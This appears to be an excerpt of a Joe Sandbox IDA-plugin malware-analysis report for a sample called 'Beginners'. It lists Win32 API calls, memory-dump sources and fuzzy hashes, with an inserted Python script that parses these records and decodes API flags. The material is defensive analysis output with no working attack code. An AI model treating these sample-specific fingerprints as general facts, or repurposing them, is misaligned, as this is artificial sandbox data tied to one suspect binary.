                                          • API String ID: 3712363035-0
                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction ID: b04f76b88c450fdc4efd7db694a5b0685734995b0beee6524ad77e46591c89d5
                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                          • Instruction Fuzzy Hash: 2731B271A00209DBD768DF59C480A6DF7A6FF99300F648AA6E409CB751E731EDC1CBA0
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 000C5FEF
                                            • Part of subcall function 000D359C: __lock.LIBCMT ref: 000D35A2
                                            • Part of subcall function 000D359C: DecodePointer.KERNEL32(00000001,?,000C6004,00108892), ref: 000D35AE
                                            • Part of subcall function 000D359C: EncodePointer.KERNEL32(?,?,000C6004,00108892), ref: 000D35B9
                                            • Part of subcall function 000C5F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000C5F18
                                            • Part of subcall function 000C5F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000C5F2D
                                            • Part of subcall function 000C5240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C526C
                                            • Part of subcall function 000C5240: IsDebuggerPresent.KERNEL32 ref: 000C527E
                                            • Part of subcall function 000C5240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000C52E6
                                            • Part of subcall function 000C5240: SetCurrentDirectoryW.KERNEL32(?), ref: 000C5366
                                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 000C602F
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 7b82ae59f997e712ab34576b82d342819bfead9e9f0ba79e19e5a57f6a7f50c7
                                          • Instruction ID: 3cbee4b89a9c788f251564543d34fc5452e259eb011c8e2b01592bde5554f137
                                          • Opcode Fuzzy Hash: 7b82ae59f997e712ab34576b82d342819bfead9e9f0ba79e19e5a57f6a7f50c7
                                          • Instruction Fuzzy Hash: 1D116D718083019BC310DF69EC45A8AFBF8EB88310F00491EF199872B3DBB095C4CB92
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,000C3E72,?,?,?,00000000), ref: 000C4327
                                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,000C3E72,?,?,?,00000000), ref: 00100717
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 7bf97414c9734b7b346fa276ad3f5ccb1af1678db56ceb6d0cfcd763ba877202
                                          • Instruction ID: a3b9647b8c81a6d63ea52f44e904376abe0b3a5034267e90bdb4ea80314274e6
                                          • Opcode Fuzzy Hash: 7bf97414c9734b7b346fa276ad3f5ccb1af1678db56ceb6d0cfcd763ba877202
                                          • Instruction Fuzzy Hash: 4C018070244249BEF3710F248C9AFAA7ADCBB05768F10C219BAE46A1E1C7F59D858B14
                                          APIs
                                            • Part of subcall function 000D593C: __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000D593C: __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000D593C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          • std::exception::exception.LIBCMT ref: 000D101C
                                          • __CxxThrowException@8.LIBCMT ref: 000D1031
                                            • Part of subcall function 000D87CB: RaiseException.KERNEL32(?,?,?,0016CAF8,?,?,?,?,?,000D1036,?,0016CAF8,?,00000001), ref: 000D8820
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: 8439bcad47e861edd0ea587e9b975cef3e1a0941946ff121df1a8978e613ee87
                                          • Instruction ID: b2d749ec11e125b32226ea5ba0c0b107ba66d1b4cb2088de3e5c9c4123e2d841
                                          • Opcode Fuzzy Hash: 8439bcad47e861edd0ea587e9b975cef3e1a0941946ff121df1a8978e613ee87
                                          • Instruction Fuzzy Hash: 27F0813550431DB6DB20BA98ED15ADE7BAC9F01310F604467F918A2792DFB18A90D6B1
                                          APIs
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: 54fc96229bfe50533ad04154822b72162bdfcb318e059064e609e58bd89173ca
                                          • Instruction ID: f502f09722159856b033765915eab388b2001845fc317c371cddb8ae20335e35
                                          • Opcode Fuzzy Hash: 54fc96229bfe50533ad04154822b72162bdfcb318e059064e609e58bd89173ca
                                          • Instruction Fuzzy Hash: 1F014871800749EBCF11AF65CC019DE7BA1AF80361F148117BC24673A2DB318611EFB1
                                          APIs
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • __lock_file.LIBCMT ref: 000D560B
                                            • Part of subcall function 000D6E3E: __lock.LIBCMT ref: 000D6E61
                                          • __fclose_nolock.LIBCMT ref: 000D5616
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: c515275361db39a7393776c4f4992e5c955044853e12585566b20a4fc832fe7e
                                          • Instruction ID: e7552000347639032be97235ac0ccfc9b15be454150432388e09fd4718aacb38
                                          • Opcode Fuzzy Hash: c515275361db39a7393776c4f4992e5c955044853e12585566b20a4fc832fe7e
                                          • Instruction Fuzzy Hash: DBF09071801B059AD7226B699C02BAE77E16F41332F25820BB864AB3C2CB7C89019B71
                                          APIs
                                          • __lock_file.LIBCMT ref: 000D5EB4
                                          • __ftell_nolock.LIBCMT ref: 000D5EBF
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          Similarity
                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2999321469-0
                                          • Opcode ID: c3d96f40201768ec1f76b65a5f949a3b78dd77b6b79c16ca6799e961fec88cbe
                                          • Instruction ID: f9d0009bd3fa324237d3b6ff0c5aab5027b90684a6c2f42cb3ec0629869205c7
                                          • Opcode Fuzzy Hash: c3d96f40201768ec1f76b65a5f949a3b78dd77b6b79c16ca6799e961fec88cbe
                                          • Instruction Fuzzy Hash: 3CF0A0319117159ADB10BB788C037EE73A06F41332F218207B820AB3D3CF788A029BB1
                                          APIs
                                          • _memset.LIBCMT ref: 000C5AEF
                                          • Shell_NotifyIconW.SHELL32(00000002,?), ref: 000C5B1F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell__memset
                                          • String ID:
                                          • API String ID: 928536360-0
                                          • Opcode ID: f1ffb5fd0c17e3dde0a1a15878dc30768d041811368ee46cf1f6b87069c68585
                                          • Instruction ID: 8698b50b218ba656b425285a2cc21e22b076d621d98e5276f27e9b5f19979d7d
                                          • Opcode Fuzzy Hash: f1ffb5fd0c17e3dde0a1a15878dc30768d041811368ee46cf1f6b87069c68585
                                          • Instruction Fuzzy Hash: CCF0A7708183089FD7929B24DC457D57BBC9701308F0001EABA4C96293DB710BC8CF51
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString$__swprintf
                                          • String ID:
                                          • API String ID: 207118244-0
                                          • Opcode ID: cf248a4a1e7c900a3ffbbca8963d15863073dadc1bbbb9f5a798c7cfc4a5b755
                                          • Instruction ID: 5aff8c28c3406cb975e794b7b25267cfb15c11714799fddd6fb5b3c6b2b44603
                                          • Opcode Fuzzy Hash: cf248a4a1e7c900a3ffbbca8963d15863073dadc1bbbb9f5a798c7cfc4a5b755
                                          • Instruction Fuzzy Hash: C9B13D35A0011ADFCB14EF94D891DEEB7B5FF58710F20811AFA15A7392EB70AA51CB90
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                          • Instruction ID: 417df4bf78b998b0d23288de8f472549d19ef9558a1939c79d149693954ce8e3
                                          • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                          • Instruction Fuzzy Hash: 6961CD70600206DFDB20DF54C881AFEB7E9EF46310F15806DE9169B692EB74ED80DB62
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02d8df17a40881af29320a984bf38a52e7dac98496d1287216228e869efdd63a
                                          • Instruction ID: 6485bdb9fcad258061fdb845abc2b1d23f6039f725ad3f5aed967948d52728c5
                                          • Opcode Fuzzy Hash: 02d8df17a40881af29320a984bf38a52e7dac98496d1287216228e869efdd63a
                                          • Instruction Fuzzy Hash: F7516E35604604ABCB14EB64C991FFEB7A6AF45310F148169F946AB393DF30EE01DB91
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                          • Instruction ID: e4c8984463a8a077af6886366238e1b950987fb21e46f1cfae95b8f5f22626ba
                                          • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                          • Instruction Fuzzy Hash: 84317079614A029FC729DF18D450F6AF7E4FF08350B14C56EE98A8B7A1DB30E981CB94
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000C41B2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 42052d750f04b070d743697037e0f3c0d22d19c129ee7d326f4a94cb19eeb371
                                          • Instruction ID: 5f2248c4f9b14f7a5b7fe93d8c50a3e5870b5152b211d6562253d7b8f6180c3d
                                          • Opcode Fuzzy Hash: 42052d750f04b070d743697037e0f3c0d22d19c129ee7d326f4a94cb19eeb371
                                          • Instruction Fuzzy Hash: EA313E71A00615AFCB18DF6DC8A4B9DB7B5BF58310F188619EC5593710D770B9908B90
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 5c7186bb262987d1b75686baba83a8ef6518d5280a102d8fac6d285edfe8a9c8
                                          • Instruction ID: a89e551f3b39d1e1a74c6b64f9ea21b7cac0b9f38fcf26a339f5d9b39fbc9cc3
                                          • Opcode Fuzzy Hash: 5c7186bb262987d1b75686baba83a8ef6518d5280a102d8fac6d285edfe8a9c8
                                          • Instruction Fuzzy Hash: 7F411974508341DFDB64DF15C488B5ABBE1BF45308F0988ACE88A9B362C776EC85CB52
                                          APIs
                                            • Part of subcall function 000C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 000C4B63
                                            • Part of subcall function 000D547B: __wfsopen.LIBCMT ref: 000D5486
                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4
                                            • Part of subcall function 000C4ADE: FreeLibrary.KERNEL32(00000000), ref: 000C4B18
                                            • Part of subcall function 000C48B0: _memmove.LIBCMT ref: 000C48FA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: 4b572a8dfd14f477ddba49f82bc5cb61fcf2b72458651f84a589a5d8ecd7645b
                                          • Instruction ID: 8f97d5209b5f8c499c7f4bad0a1908167c1eb13ed876c94ea5a37f8ab3407fb5
                                          • Opcode Fuzzy Hash: 4b572a8dfd14f477ddba49f82bc5cb61fcf2b72458651f84a589a5d8ecd7645b
                                          • Instruction Fuzzy Hash: 5811E731A50205ABCB25FB70CC26FEE77A9AF44701F10842EF545A61D2EFB09E10A7A5
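The records in this part of the report are the IDA plugin's per-function summaries: the APIs the function reaches (directly, or "Part of subcall function" when a callee issues the call), the constant arguments it could recover ("?" marks values it could not resolve statically), the memory dump the code was lifted from, and the opcode and instruction fuzzy hashes used for similarity matching. The Python below is an added example, not part of the Joe Sandbox report or its plugin: it parses records in this layout into structured entries, decodes the two constant arguments that matter for triage in the LoadLibraryExW record just above and the Shell_NotifyIconW record earlier in this section, and lists every watched call with the address it is made from. The sample text is constructed from those two records; the watchlist is hypothetical, and the flag and message tables are the documented Win32 values, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample in the layout the Joe Sandbox IDA plugin emits, copied from this
# report's LoadLibraryExW (ref 000C49F4) and Shell_NotifyIconW (ref 000C5B1F) records.
SAMPLE = """\
APIs
  • Part of subcall function 000C4B29: FreeLibrary.KERNEL32(00000000,?), ref: 000C4B63
  • Part of subcall function 000D547B: __wfsopen.LIBCMT ref: 000D5486
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4
Similarity
• API String ID: 1396898556-0
• Opcode ID: 4b572a8dfd14f477ddba49f82bc5cb61fcf2b72458651f84a589a5d8ecd7645b
• Instruction Fuzzy Hash: 5811E731A50205ABCB25FB70CC26FEE77A9AF44701F10842EF545A61D2EFB09E10A7A5
APIs
• _memset.LIBCMT ref: 000C5AEF
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 000C5B1F
Similarity
• API String ID: 928536360-0
• Opcode ID: f1ffb5fd0c17e3dde0a1a15878dc30768d041811368ee46cf1f6b87069c68585
• Instruction Fuzzy Hash: CCF0A7708183089FD7929B24DC457D57BBC9701308F0001EABA4C96293DB710BC8CF51
"""

SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• Name.MODULE(args), ref: ADDR" or "• Part of subcall function ADDR: Name.MODULE ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<parent>[0-9A-F]+): )?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[^:]+?):\s*(?P<val>.*)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple            # values as recorded; "?" means the plugin could not resolve it
    ref: str               # address of the call instruction
    parent: Optional[str]  # address of the sub-function that really issues the call, if any

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

def parse_records(text):
    """One FunctionRecord per block; 'Instruction Fuzzy Hash' is always the last field."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            args = tuple(m["args"].split(",")) if m["args"] else ()
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records

# Documented Win32 constants (the report only records the raw hex values).
LOAD_LIBRARY_FLAGS = {
    0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
    0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x10: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x80: "LOAD_LIBRARY_REQUIRE_SIGNED_TARGET", 0x100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR", 0x400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}
NIM_MESSAGES = {0: "NIM_ADD", 1: "NIM_MODIFY", 2: "NIM_DELETE", 3: "NIM_SETFOCUS", 4: "NIM_SETVERSION"}

def decode_flags(value, table):
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)          # bits not in the table are reported raw
    return names + ([hex(leftover)] if leftover else [])

def describe(call):
    """Explain constant arguments that change what a watched API does."""
    if call.name == "LoadLibraryExW" and len(call.args) >= 3 and call.args[2] != "?":
        flags = decode_flags(int(call.args[2], 16), LOAD_LIBRARY_FLAGS) or ["0"]
        return "LoadLibraryExW dwFlags=" + "|".join(flags)
    if call.name == "Shell_NotifyIconW" and call.args and call.args[0] != "?":
        return "Shell_NotifyIconW " + NIM_MESSAGES.get(int(call.args[0], 16), "unknown")
    return None

# Hypothetical watchlist for this sample; adjust to the behaviour under investigation.
WATCHLIST = {"LoadLibraryExW", "Shell_NotifyIconW", "ReadFile", "SetFilePointerEx",
             "GetEnvironmentVariableW", "GetLongPathNameW"}

def triage(records):
    """(opcode id prefix, api, call address, note) for each watched call, direct or via subcall."""
    return [(rec.fields.get("Opcode ID", "")[:12], call.name, call.ref, describe(call))
            for rec in records for call in rec.apis if call.name in WATCHLIST]
```

Run `triage(parse_records(SAMPLE))` on the constructed sample and the two decoded values are the ones worth noting: dwFlags 00000002 is LOAD_LIBRARY_AS_DATAFILE, so the LoadLibraryExW call at 000C49F4 maps the module for data or resource access without executing its DllMain, and Shell_NotifyIconW with 00000002 is NIM_DELETE, so the function at 000C5B1F removes a tray icon rather than creating one. Neither is malicious on its own; the point of keeping the call address alongside each hit is that it can be fed straight back into the dump listed under "Source File" for manual review, and the opcode and fuzzy hash fields stay attached for clustering against other samples.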
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 5277e1c82ca159795c7228feb536c38e7098dcbad8e179c2125297abd124d688
                                          • Instruction ID: 34fcb11cbe39106c2c85046c59a04d6f08ca809f6738e0d2b705bc4566d451d7
                                          • Opcode Fuzzy Hash: 5277e1c82ca159795c7228feb536c38e7098dcbad8e179c2125297abd124d688
                                          • Instruction Fuzzy Hash: FA2125B4508341DFDB64DF54C444B9ABBE1BF88304F09496CF98A57322C736E849CBA2
                                          APIs
                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,000C3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000C4276
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: bd36fe36ab4d8feb45ba0f6045600b18629cff826ff076e466a11f0ab7d667d1
                                          • Instruction ID: f139026569baffbaf1cdb07a8bff35510ed30dfd98b6f6d046ddfab41ff4b180
                                          • Opcode Fuzzy Hash: bd36fe36ab4d8feb45ba0f6045600b18629cff826ff076e466a11f0ab7d667d1
                                          • Instruction Fuzzy Hash: 7E112531200B019FD370CF55C891F6AB7E9FF88720F54892EE9AA86A50D7B0E8458B60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                          • Instruction ID: 988964129b73e9c89d91a844eef79523562130e1cedecef757b36c87523b81d5
                                          • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                          • Instruction Fuzzy Hash: E301D6722017016ED3245B39D802FABBB98DF457A0F10852EF51ACA2D2EA71E4408BA4
                                          APIs
                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00124998
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: EnvironmentVariable
                                          • String ID:
                                          • API String ID: 1431749950-0
                                          • Opcode ID: e2d8a617e1c9b81a81403b632cc0f3b029fc9c16a7ecd559d1541e34a9737975
                                          • Instruction ID: 03b9783c6089910664937f6c8af419304ea6bf60b50b81c0e356a2b9c8f48323
                                          • Opcode Fuzzy Hash: e2d8a617e1c9b81a81403b632cc0f3b029fc9c16a7ecd559d1541e34a9737975
                                          • Instruction Fuzzy Hash: 89F01D35608204AF9B14FB65D846DDF7BB8EF49320B00405AF9099B3A2DE70A9818B61
                                          APIs
                                            • Part of subcall function 000D0FE6: std::exception::exception.LIBCMT ref: 000D101C
                                            • Part of subcall function 000D0FE6: __CxxThrowException@8.LIBCMT ref: 000D1031
